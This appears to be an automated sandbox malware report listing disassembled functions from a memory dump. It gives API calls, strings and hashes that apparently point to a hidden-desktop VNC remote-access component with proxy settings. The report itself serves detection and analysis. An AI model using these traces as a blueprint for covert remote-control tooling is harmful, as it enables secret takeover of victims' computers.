Function 00007FF790C5551D Relevance: 21.3, APIs: 7, Strings: 5, Instructions: 293COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF790C95F30: EnterCriticalSection.KERNEL32(?,?,?,00007FF790C53ABC), ref: 00007FF790C95F41
Part of subcall function 00007FF790C95F30: LeaveCriticalSection.KERNEL32(?,?,?,00007FF790C53ABC), ref: 00007FF790C95F75

OpenInputDesktop.USER32 ref: 00007FF790C5407F
CloseDesktop.USER32 ref: 00007FF790C540C2

Part of subcall function 00007FF790C95F30: LeaveCriticalSection.KERNEL32(?,?,?,00007FF790C53ABC), ref: 00007FF790C95F8C

EnterCriticalSection.KERNEL32 ref: 00007FF790C555F1
LeaveCriticalSection.KERNEL32 ref: 00007FF790C55622
InvalidateRect.USER32 ref: 00007FF790C556E7
LeaveCriticalSection.KERNEL32 ref: 00007FF790C556FE

Strings

vncclient.cpp : vncClientThread , xrefs: 00007FF790C54029
vncservice.cpp : OpenInputdesktop2 NULL, xrefs: 00007FF790C54060
vncservice.cpp : OpenInputdesktop2 OK, xrefs: 00007FF790C5409A
vncservice.cpp : SelectDesktop , xrefs: 00007FF790C5404B
W, xrefs: 00007FF790C555E4

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: CriticalSection$Leave$DesktopEnter$CloseInputInvalidateOpenRect
String ID: W$vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
API String ID: 1769082246-4238595597
Opcode ID: 28edabc9feb7bdb14e1d1faffb3798e9d0b80a49f6f41662df86053fe061b59e
Instruction ID: 63072b6d7261cdf3852aad528e18576acc4f7443c772b12b44be05ec09436111
Opcode Fuzzy Hash: 28edabc9feb7bdb14e1d1faffb3798e9d0b80a49f6f41662df86053fe061b59e
Instruction Fuzzy Hash: 10E1A02661C6D185E760EB39C458BFEBBA1EF86B88F854131DA4C477A5CF38E441C720

Function 00007FF790C55958 Relevance: 21.3, APIs: 7, Strings: 5, Instructions: 266COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF790C559AB

Part of subcall function 00007FF790C5C2C0: EnterCriticalSection.KERNEL32 ref: 00007FF790C5C326
Part of subcall function 00007FF790C5C2C0: LeaveCriticalSection.KERNEL32 ref: 00007FF790C5C33B

Strings

vncclient.cpp : vncClientThread , xrefs: 00007FF790C54029
vncservice.cpp : OpenInputdesktop2 NULL, xrefs: 00007FF790C54060
vncservice.cpp : OpenInputdesktop2 OK, xrefs: 00007FF790C5409A
vncservice.cpp : SelectDesktop , xrefs: 00007FF790C5404B
X, xrefs: 00007FF790C559A1

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: CriticalSection$Enter$Leave
String ID: X$vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
API String ID: 2801635615-1537001432
Opcode ID: dd0377157924df05a1a969f1e9d28644e8767d3accdb4255640eb5cd2624909b
Instruction ID: 663f5648bb8a8128fc53b913bc33ac7bcd3e486c5cf467dc3d2a9204dead41ce
Opcode Fuzzy Hash: dd0377157924df05a1a969f1e9d28644e8767d3accdb4255640eb5cd2624909b
Instruction Fuzzy Hash: 5BD1A326A1CA9185E760EB35C4587FEBBA0EF86B88F954131CA4D477A5CF38F485C720

Function 00007FF790C3AB70 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 65COMMON

Download Yara Rule

APIs

SystemParametersInfoA.USER32 ref: 00007FF790C3ABA9
GetLastError.KERNEL32 ref: 00007FF790C3ABB3
SystemParametersInfoA.USER32 ref: 00007FF790C3AC07
GetLastError.KERNEL32 ref: 00007FF790C3AC11
SystemParametersInfoA.USER32 ref: 00007FF790C3AC62
GetLastError.KERNEL32 ref: 00007FF790C3AC6C

Strings

HideDesktop.cpp : Failed to restore SPI value for SPI_SETCLEARTYPE (0x%08x), xrefs: 00007FF790C3AC17
HideDesktop.cpp : Failed to restore SPI value for SPI_SETFONTSMOOTHING (0x%08x), xrefs: 00007FF790C3ABB9
HideDesktop.cpp : Restored SPI value for SPI_SETFONTSMOOTHING: 0x%08x, xrefs: 00007FF790C3ABD4
HideDesktop.cpp : Failed to restore SPI value for SPI_SETFONTSMOOTHINGTYPE (0x%08x), xrefs: 00007FF790C3AC72
HideDesktop.cpp : Restored SPI value for SPI_SETCLEARTYPE: 0x%08x, xrefs: 00007FF790C3AC2F
HideDesktop.cpp : Restored SPI value for SPI_SETFONTSMOOTHINGTYPE: 0x%08x, xrefs: 00007FF790C3AC8A

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: ErrorInfoLastParametersSystem
String ID: HideDesktop.cpp : Failed to restore SPI value for SPI_SETCLEARTYPE (0x%08x)$HideDesktop.cpp : Failed to restore SPI value for SPI_SETFONTSMOOTHING (0x%08x)$HideDesktop.cpp : Failed to restore SPI value for SPI_SETFONTSMOOTHINGTYPE (0x%08x)$HideDesktop.cpp : Restored SPI value for SPI_SETCLEARTYPE: 0x%08x$HideDesktop.cpp : Restored SPI value for SPI_SETFONTSMOOTHING: 0x%08x$HideDesktop.cpp : Restored SPI value for SPI_SETFONTSMOOTHINGTYPE: 0x%08x
API String ID: 2777246624-426764769
Opcode ID: be58b1c1191ffcc8586d2d23b3617e6acfb6b4a2149be82d11eb37b622f5d697
Instruction ID: 21dd84a55181db5ba14a30bad21e00e50a707dcb858550135a4dfaf80bddb82d
Opcode Fuzzy Hash: be58b1c1191ffcc8586d2d23b3617e6acfb6b4a2149be82d11eb37b622f5d697
Instruction Fuzzy Hash: 013136A4A3854796F734BB31A800BB5E7A0BF55748FC0A036C40E533A0DE2EF84AC760

Function 00007FF790C611E0 Relevance: 19.6, APIs: 13, Instructions: 103windowCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,?,00000000,?,00000000,?,00007FF790C6C1D6), ref: 00007FF790C61206
CreateCompatibleBitmap.GDI32 ref: 00007FF790C61221
LeaveCriticalSection.KERNEL32(?,?,?,?,?,00000000,?,00000000,?,00007FF790C6C1D6), ref: 00007FF790C61236
SelectObject.GDI32 ref: 00007FF790C61255
DeleteObject.GDI32 ref: 00007FF790C61266
LeaveCriticalSection.KERNEL32(?,?,?,?,?,00000000,?,00000000,?,00007FF790C6C1D6), ref: 00007FF790C61273

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: CriticalSection$LeaveObject$BitmapCompatibleCreateDeleteEnterSelect
String ID:
API String ID: 4219907860-0
Opcode ID: 956026f9412a0f1138a85547ad9db4196a3aa927d16836a46ddc08f3773cee07
Instruction ID: f2a7fed4c2ea39e52ec98b45e476fdc36e5af8a5f31390167d720d7a819140ef
Opcode Fuzzy Hash: 956026f9412a0f1138a85547ad9db4196a3aa927d16836a46ddc08f3773cee07
Instruction Fuzzy Hash: 25416626624A8296E730AF35A8546AEB3B4FF89BD8F845035DE4E47B54DF3CE104C714

Function 00007FF790C61AE0 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 114libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FF790C61B1E
GetProcAddress.KERNEL32 ref: 00007FF790C61B36
LoadLibraryA.KERNEL32 ref: 00007FF790C61B44
GetProcAddress.KERNEL32 ref: 00007FF790C61B5C
FreeLibrary.KERNEL32 ref: 00007FF790C61C51
FreeLibrary.KERNEL32 ref: 00007FF790C61C62
FreeLibrary.KERNEL32 ref: 00007FF790C61C71

Strings

MonitorFromPointA, xrefs: 00007FF790C61B52
(, xrefs: 00007FF790C61B0F
GetMonitorInfoA, xrefs: 00007FF790C61B2C
USER32, xrefs: 00007FF790C61B17, 00007FF790C61B3D

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: Library$Free$AddressLoadProc
String ID: ($GetMonitorInfoA$MonitorFromPointA$USER32
API String ID: 1386263645-671781545
Opcode ID: de9e37aab11e1b949d1bdc09dbfd75982bc7ac87204d7d26c8bfb04ef9f01631
Instruction ID: 56ce911ac21f3815030b945d8c864e5090a2b91adf803c2249a235074df44f96
Opcode Fuzzy Hash: de9e37aab11e1b949d1bdc09dbfd75982bc7ac87204d7d26c8bfb04ef9f01631
Instruction Fuzzy Hash: 99419C7592CA0396EB78AF31E4543BCA2A4EF46B6AF981130C91D463D4DF7CF4848221

Function 00007FF790C3B310 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 83COMMON

Download Yara Rule

APIs

_wgetenv.LIBCMT ref: 00007FF790C3B338

Part of subcall function 00007FF790CE9500: _errno.LIBCMT ref: 00007FF790CE9515
Part of subcall function 00007FF790CE9500: _invalid_parameter_noinfo.LIBCMT ref: 00007FF790CE9520

_wgetenv.LIBCMT ref: 00007FF790C3B373
_wgetenv.LIBCMT ref: 00007FF790C3B3A5
_wgetenv.LIBCMT ref: 00007FF790C3B3C7
_wgetenv.LIBCMT ref: 00007FF790C3B3F5
GetUserNameA.ADVAPI32 ref: 00007FF790C3B436

Strings

HTTP_PROXY_USER, xrefs: 00007FF790C3B3C0, 00007FF790C3B3D4
SOCKS5_USER, xrefs: 00007FF790C3B331, 00007FF790C3B345
SOCKS_USER, xrefs: 00007FF790C3B39E, 00007FF790C3B3B2
SOCKS4_USER, xrefs: 00007FF790C3B36C, 00007FF790C3B380
CONNECT_USER, xrefs: 00007FF790C3B3EE, 00007FF790C3B402

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: _wgetenv$NameUser_errno_invalid_parameter_noinfo
String ID: CONNECT_USER$HTTP_PROXY_USER$SOCKS4_USER$SOCKS5_USER$SOCKS_USER
API String ID: 3057866299-2798169553
Opcode ID: a7b8bb38faf38aa79791e2a14257626f8ee9895d63d419d597d659aa22ea67ad
Instruction ID: a6cc2459eac960742cc72d0b6358d4d78e3a231927885304cc5d57ffd04e6910
Opcode Fuzzy Hash: a7b8bb38faf38aa79791e2a14257626f8ee9895d63d419d597d659aa22ea67ad
Instruction Fuzzy Hash: 3831CA21A3A64690EEB9FB35D4912F8E2A1AF55744FC81435EB0D463A2FF2CF854C360

Function 00007FF790C43A60 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 72registryCOMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32 ref: 00007FF790C43A8C
RegCreateKeyExA.ADVAPI32 ref: 00007FF790C43AF7
RegOpenKeyExA.ADVAPI32 ref: 00007FF790C43B24
RegQueryValueExA.ADVAPI32 ref: 00007FF790C43B6A
RegCloseKey.ADVAPI32 ref: 00007FF790C43B79
RegCloseKey.ADVAPI32 ref: 00007FF790C43B84

Strings

SoftwareSASGeneration, xrefs: 00007FF790C43B4B
SOFTWARE\Microsoft\Windows\CurrentVersion\Policies, xrefs: 00007FF790C43ABB
System, xrefs: 00007FF790C43B0F

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: Close$CreateOpenQueryValueVersion
String ID: SOFTWARE\Microsoft\Windows\CurrentVersion\Policies$SoftwareSASGeneration$System
API String ID: 1076069355-3579764778
Opcode ID: 87e8c0d61f37e34202edbdab6bff78c1ba5551bc53e556ab61ee4318769b540b
Instruction ID: d299e3539f6d0c9689fb559f51413f0601ae5507a6febb21f2710a5d9ff65b4a
Opcode Fuzzy Hash: 87e8c0d61f37e34202edbdab6bff78c1ba5551bc53e556ab61ee4318769b540b
Instruction Fuzzy Hash: 64310E72A18B8286EB70AB30F4553AAF7B0FB89754F801135E68D46B64DF7CE159CB10

Function 00007FF790C4DA10 Relevance: 18.1, APIs: 12, Instructions: 111COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF790C4DA63
GetRgnBox.GDI32 ref: 00007FF790C4DA7A
GetRgnBox.GDI32 ref: 00007FF790C4DABE
GetRgnBox.GDI32 ref: 00007FF790C4DAF4
GetRgnBox.GDI32 ref: 00007FF790C4DB23
DeleteObject.GDI32 ref: 00007FF790C4DB3C
free.LIBCMT ref: 00007FF790C4DB47
DeleteObject.GDI32 ref: 00007FF790C4DB5A
free.LIBCMT ref: 00007FF790C4DB65
DeleteObject.GDI32 ref: 00007FF790C4DB75
free.LIBCMT ref: 00007FF790C4DB80
LeaveCriticalSection.KERNEL32 ref: 00007FF790C4DB89

Part of subcall function 00007FF790C3F840: CreateRectRgn.GDI32 ref: 00007FF790C3F872
Part of subcall function 00007FF790C3F840: CombineRgn.GDI32 ref: 00007FF790C3F88A
Part of subcall function 00007FF790C3F840: CombineRgn.GDI32 ref: 00007FF790C3F89F

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: DeleteObjectfree$CombineCriticalSection$CreateEnterLeaveRect
String ID:
API String ID: 707770685-0
Opcode ID: e8ce359a573d540e0fad56669d64a20bc3cc88b06a8798c1e7988a6509252d61
Instruction ID: 0cb3e3d969dea026f7911e498809f591b8e01b4a587a4ce990ceb8d2f16dc87b
Opcode Fuzzy Hash: e8ce359a573d540e0fad56669d64a20bc3cc88b06a8798c1e7988a6509252d61
Instruction Fuzzy Hash: D0418432628B4186D660AB35E4442A9B3B1FFCABD0F951231EA9E477A5CF3CE545C710

Function 00007FF790CA0440 Relevance: 18.1, APIs: 12, Instructions: 110memoryCOMMON

Download Yara Rule

APIs

GlobalLock.KERNEL32 ref: 00007FF790CA045F
GlobalAlloc.KERNEL32(?,?,?,00007FF790C5C1D3), ref: 00007FF790CA0479
GlobalUnlock.KERNEL32 ref: 00007FF790CA0492

Part of subcall function 00007FF790CA1740: free.LIBCMT ref: 00007FF790CA1777

GlobalFree.KERNEL32 ref: 00007FF790CA049F
GlobalLock.KERNEL32 ref: 00007FF790CA04BA
GlobalUnlock.KERNEL32 ref: 00007FF790CA04D3
GlobalFree.KERNEL32 ref: 00007FF790CA04E0
GlobalFree.KERNEL32 ref: 00007FF790CA04ED
GlobalUnlock.KERNEL32 ref: 00007FF790CA0607
GlobalFree.KERNEL32 ref: 00007FF790CA0614
GlobalUnlock.KERNEL32 ref: 00007FF790CA0626
GlobalFree.KERNEL32 ref: 00007FF790CA0633

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: Global$Free$Unlock$Lock$Allocfree
String ID:
API String ID: 2417228145-0
Opcode ID: 83e6b6226f67f1017ea51708f5668e2a6f5a10fa7ee1f8b094fae28aff0d63d9
Instruction ID: e384c5ce4c292c84064d2eaa15a779e0b0913d9e144e91d477e6ed7746cc22b2
Opcode Fuzzy Hash: 83e6b6226f67f1017ea51708f5668e2a6f5a10fa7ee1f8b094fae28aff0d63d9
Instruction Fuzzy Hash: 9F512536A24B4285DB609F36E4802E8B7B0FB99F98F495436CE5D47724DF78E494C720

Function 00007FF790C409E0 Relevance: 18.1, APIs: 12, Instructions: 97COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF790C3F840: CreateRectRgn.GDI32 ref: 00007FF790C3F872
Part of subcall function 00007FF790C3F840: CombineRgn.GDI32 ref: 00007FF790C3F88A
Part of subcall function 00007FF790C3F840: CombineRgn.GDI32 ref: 00007FF790C3F89F

CombineRgn.GDI32 ref: 00007FF790C40A5A
CombineRgn.GDI32 ref: 00007FF790C40A72
CombineRgn.GDI32 ref: 00007FF790C40A8A
GetRgnBox.GDI32 ref: 00007FF790C40A9A
GetRgnBox.GDI32 ref: 00007FF790C40AC2
GetRgnBox.GDI32 ref: 00007FF790C40AE6
DeleteObject.GDI32 ref: 00007FF790C40B06
free.LIBCMT ref: 00007FF790C40B11
DeleteObject.GDI32 ref: 00007FF790C40B1C
free.LIBCMT ref: 00007FF790C40B27
DeleteObject.GDI32 ref: 00007FF790C40B32
free.LIBCMT ref: 00007FF790C40B3D

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: Combine$DeleteObjectfree$CreateRect
String ID:
API String ID: 3143477926-0
Opcode ID: 0a56b58438f5393381c87e283caa4a4dd7c9b87ade4efda876708c0d747ae0c3
Instruction ID: 6ce448fd755e4a4760c81d0a1ff75ca2600e4244a40ada249cc07c0605b8c6c6
Opcode Fuzzy Hash: 0a56b58438f5393381c87e283caa4a4dd7c9b87ade4efda876708c0d747ae0c3
Instruction Fuzzy Hash: E9412D72628A8291DA60AB35E8544AEB730FFCABD4F805131EE8E47764CE3CE545C714

Function 00007FF790C355D0 Relevance: 18.0, APIs: 7, Strings: 5, Instructions: 48COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32 ref: 00007FF790C355EC
InitializeCriticalSection.KERNEL32 ref: 00007FF790C355F9
sprintf.LIBCMT ref: 00007FF790C35623

Part of subcall function 00007FF790CE7C50: _errno.LIBCMT ref: 00007FF790CE7C88
Part of subcall function 00007FF790CE7C50: _invalid_parameter_noinfo.LIBCMT ref: 00007FF790CE7C93

sprintf.LIBCMT ref: 00007FF790C35636
sprintf.LIBCMT ref: 00007FF790C35649
sprintf.LIBCMT ref: 00007FF790C3565C
sprintf.LIBCMT ref: 00007FF790C3566F

Strings

0.0.0, xrefs: 00007FF790C3562F
Unknown, xrefs: 00007FF790C35605
12-12-2002, xrefs: 00007FF790C35642
